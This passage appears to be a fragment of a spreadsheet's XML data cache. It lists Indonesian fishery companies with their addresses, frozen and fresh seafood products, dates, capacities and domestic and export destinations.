    <s v="Australia, China, Hong Kong, Japan, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="21483"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Thailand"/>
  </r>
  <r>
    <n v="21484"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21485"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21486"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="75000"/>
    <s v="Kabupaten Bogor, Kabupaten Bandung"/>
    <s v="China, Korea, Republic of, Malaysia, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21487"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Malaysia, Thailand"/>
  </r>
  <r>
    <n v="21488"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="25000"/>
    <s v="Kabupaten Toli-Toli"/>
    <s v="Australia, Malaysia"/>
  </r>
  <r>
    <n v="21489"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="China, Korea, Republic of"/>
  </r>
  <r>
    <n v="21490"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Rajungan Beku"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Thailand"/>
  </r>
  <r>
    <n v="21491"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Lemuru, Kembung, Marlin, Sarden, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Korea, Republic of, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21492"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Republic of, Malaysia"/>
  </r>
  <r>
    <n v="21493"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="48000"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="21494"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Swanggi, Kerapu, Layur, Bawal, Kakap, Kuro, Kurisi, Ekor Kuning)"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="25000"/>
    <s v="Kabupaten Toli-Toli"/>
    <s v="Hong Kong, Malaysia, Thailand"/>
  </r>
  <r>
    <n v="21495"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Kembung, Marlin, Sarden, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Korea, Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21496"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Swanggi, Kuwe, Kerapu, Layur, Bawal, Kakap, Kuro)"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Republic of, Malaysia, Thailand"/>
  </r>
  <r>
    <n v="21497"/>
    <x v="531"/>
    <s v="CV. INDOSEA MAKMUR"/>
    <s v="Jl. Lambung Mangkurat RT 013 RW 006, Kel. Gunung Makmur, Kec. Takisung, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Udang Rebon Asin Segar"/>
    <d v="2020-08-07T00:00:00"/>
    <n v="104720"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21498"/>
    <x v="532"/>
    <s v="UD. MITRA BAHARI"/>
    <s v="Jl. Besar Teluk Nibung, Kel. Pematang Pasir, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Rajungan Segar"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21499"/>
    <x v="532"/>
    <s v="UD. MITRA BAHARI"/>
    <s v="Jl. Besar Teluk Nibung, Kel. Pematang Pasir, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Segar"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21500"/>
    <x v="532"/>
    <s v="UD. MITRA BAHARI"/>
    <s v="Jl. Besar Teluk Nibung, Kel. Pematang Pasir, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21505"/>
    <x v="533"/>
    <s v="CV. SINAR MUTIARA ABADI"/>
    <s v="Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Surabaya"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21508"/>
    <x v="272"/>
    <s v="CV. 88 AURORA"/>
    <s v="Jl. Raya By Pass BIL KM-15, Kel. Jonggat, Kec. Labulia, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Fillet Patin Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="100"/>
    <s v="Kabupaten Lombok Tengah"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="21509"/>
    <x v="534"/>
    <s v="CV. TUNA BAHARI"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Tumumpa, Kel. Tumumpa Dua, Kec. Tuminting, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21510"/>
    <x v="534"/>
    <s v="CV. TUNA BAHARI"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Tumumpa, Kel. Tumumpa Dua, Kec. Tuminting, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Steak Segar"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21511"/>
    <x v="534"/>
    <s v="CV. TUNA BAHARI"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Tumumpa, Kel. Tumumpa Dua, Kec. Tuminting, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Saku Beku"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21512"/>
    <x v="534"/>
    <s v="CV. TUNA BAHARI"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Tumumpa, Kel. Tumumpa Dua, Kec. Tuminting, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21515"/>
    <x v="223"/>
    <s v="PT. INSAN CITRAPRIMA SEJAHTERA"/>
    <s v="Jl. Raya Jenu - Merak Urak No.148 C, Kel. Sekardadi, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kering"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Barat, Kota Semarang, Kota Surabaya"/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21516"/>
    <x v="535"/>
    <s v="PT, LAUTAN DELI JAYA"/>
    <s v="Jl, Raya Perancis Gudang 9 Blok BG-BH , Kel, Dadap, Kec, Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Mackerel, Lemuru, Sarden, Layang, Tongkol, Baby Tuna, Kembung, Deho, Tenggiri)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bogor"/>
    <m/>
  </r>
  <r>
    <n v="21517"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Kerapu, Kaneke, Laccukang, Guntur)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="75021"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="21518"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerapu, Kaneke, Laccukang, Kakap Merah, Guntur)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="21519"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="2100000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="21520"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Tongkol, Cakalang, Tenggiri)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="21521"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Tongkol, Cakalang, Tenggiri)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="21522"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Nila)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="21523"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Russian Federation, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21524"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21525"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="21526"/>
    <x v="536"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="21527"/>
    <x v="537"/>
    <s v="PT. MALUKU UTARA FISHERIES"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Bacan, Jl. Raya Desa Panamboang, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Beku (Kerapu, Bawal, Kakap Merah, Samge)"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21528"/>
    <x v="537"/>
    <s v="PT. MALUKU UTARA FISHERIES"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Bacan, Jl. Raya Desa Panamboang, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Udang Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21529"/>
    <x v="537"/>
    <s v="PT. MALUKU UTARA FISHERIES"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Bacan, Jl. Raya Desa Panamboang, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Selayang, Cakalang, Selar Kuning)"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Russian Federation"/>
  </r>
  <r>
    <n v="21530"/>
    <x v="537"/>
    <s v="PT. MALUKU UTARA FISHERIES"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Bacan, Jl. Raya Desa Panamboang, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="21531"/>
    <x v="538"/>
    <s v="PT. ALAM SAMUDRA TIMUR"/>
    <s v="Jl. Teluk Waya, Kel. Waiya, Kec. Depapre, Kabupaten Jayapura&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Sri Lanka, United Arab Emirates, United Kingdom"/>
  </r>
  <r>
    <n v="21532"/>
    <x v="539"/>
    <s v="PT. MINAMARIN BAHARI KENCANA"/>
    <s v="Jl. Pantai Sari No.1 Komplek Techno Park Perikanan, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Mata Goyang, Layur, Gulama, Bawal, Kakap, Kurisi, Jaket, Cunang)"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Pusat, Kota Cirebon, Kabupaten Pati, Kabupaten Pekalongan, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kabupaten Tuban, Kabupaten Lamongan"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21533"/>
    <x v="539"/>
    <s v="PT. MINAMARIN BAHARI KENCANA"/>
    <s v="Jl. Pantai Sari No.1 Komplek Techno Park Perikanan, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Lemuru, Kembung, Layang)"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Pusat, Kota Cirebon, Kabupaten Pati, Kabupaten Pekalongan, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kabupaten Tuban, Kabupaten Lamongan"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21534"/>
    <x v="539"/>
    <s v="PT. MINAMARIN BAHARI KENCANA"/>
    <s v="Jl. Pantai Sari No.1 Komplek Techno Park Perikanan, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Pusat, Kota Cirebon, Kabupaten Pati, Kabupaten Pekalongan, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kabupaten Tuban, Kabupaten Lamongan"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21536"/>
    <x v="540"/>
    <s v="AULI"/>
    <s v="Jl. Plantar KUD, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Manyung, Kerapu, Bawal, Kakap, Kaci-kaci, Kurisi)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="72000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21537"/>
    <x v="540"/>
    <s v="AULI"/>
    <s v="Jl. Plantar KUD, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Mata Besar, Tongkol, Kembung, Selar, Tenggiri)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="68000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21538"/>
    <x v="540"/>
    <s v="AULI"/>
    <s v="Jl. Plantar KUD, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-cumi)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21539"/>
    <x v="541"/>
    <s v="HARUN"/>
    <s v="Jl. Plantar I No.59 H, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Selar, Tenggiri)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="68000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21540"/>
    <x v="541"/>
    <s v="HARUN"/>
    <s v="Jl. Plantar I No.59 H, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Bawal, Kerapu, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="44000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21541"/>
    <x v="349"/>
    <s v="PT. INSAN CITRAPRIMA SEJAHTERA"/>
    <s v="Jl. Raya Rembang-Juana Km 5, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Kering"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21542"/>
    <x v="542"/>
    <s v="PT. MAHKOTA MARITIM MAKMUR"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav 8-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Emperor, Lencam, Kerapu, Layur, Kakatua, Bawal, Kakap)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan, Korea, Democratic People's Republic of, Malaysia, Mauritius, South Africa, Suriname, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21543"/>
    <x v="542"/>
    <s v="PT. MAHKOTA MARITIM MAKMUR"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav 8-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan, Korea, Democratic People's Republic of, Malaysia, Mauritius, Philippines, Singapore, South Africa, Suriname, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21544"/>
    <x v="542"/>
    <s v="PT. MAHKOTA MARITIM MAKMUR"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav 8-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Suriname"/>
  </r>
  <r>
    <n v="21545"/>
    <x v="542"/>
    <s v="PT. MAHKOTA MARITIM MAKMUR"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav 8-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan, Korea, Democratic People's Republic of, Malaysia, Mauritius, Philippines, Singapore, South Africa, Suriname, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21546"/>
    <x v="542"/>
    <s v="PT. MAHKOTA MARITIM MAKMUR"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav 8-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Todak)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Central African Republic, Japan, Korea, Democratic People's Republic of, Malaysia, Mauritius, Philippines, Singapore, South Africa, Suriname, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21547"/>
    <x v="543"/>
    <s v="PT. DAYARA LAUT SEJAHTERA"/>
    <s v="Pergudangan Sinar Buduran 3 Blok B23, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Kembung, Malalugis, Lemadang, Marlin, Meka, Cakalang)"/>
    <d v="2020-08-14T00:00:00"/>
    <n v="0"/>
